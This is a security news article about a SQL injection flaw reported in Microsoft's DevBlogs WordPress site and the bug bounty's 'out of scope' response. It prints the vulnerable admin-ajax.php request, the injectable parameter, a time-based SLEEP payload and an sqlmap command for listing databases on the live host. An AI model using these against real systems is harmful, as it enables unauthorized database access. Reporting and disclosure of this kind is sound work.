A security researcher recently discovered a critical SQL injection vulnerability on Microsoft’s DevBlogs site (https://devblogs.microsoft.com), allowing attackers to manipulate the database with malicious SQL queries, threatening platform security and data integrity.
SQL Injection Vulnerability
The vulnerability was found in the WordPress-based CMS of DevBlogs, specifically in a request to the admin-ajax.php endpoint handling asynchronous operations:
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: /
x-requested-with: XMLHttpRequest
Referer: https://devblogs.microsoft.com/
Cookie: VALUE
Content-Length: 17894
Accept-Encoding: gzip,deflate,br
User-Agent: NOTROBOT
Host: devblogs.microsoft.com
Connection: Keep-alive
action=load_more_results2&limit=10&offset=10&query=HELLO&search_term=the
The query
parameter was vulnerable to SQL injection. Using a time-based payload like (SELECT 4008 FROM (SELECT(SLEEP(5)))LDNk)
, the researcher showed it could exploit and manipulate database queries.
The researcher used sqlmap to extract database names, proving the vulnerability. The command:
sqlmap -r savedreqsql.txt --dbs --force-ssl -p query
revealed databases like information_schema
, performance_schema
, and wp_devblogs
.
The researcher found that the vulnerability also supported error-based SQL injection, which was easier to exploit than the initial time-based method.
After reporting the issue to Microsoft’s security team, researcher Zhenwarx received an unexpected response. Despite the severity of the flaw, the DevBlogs subdomain was marked “out of scope,” leaving the vulnerability unpatched at the time.
This highlights the critical need for proper input validation and clear scope definitions in bug bounty programs.
DevBlogs, as a public-facing Microsoft subdomain, is a prime target for attackers. Organizations should regularly audit security practices, especially on WordPress platforms, to prevent such vulnerabilities. There is hope Microsoft will reassess its scope and resolve the issue soon.
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Leave A Comment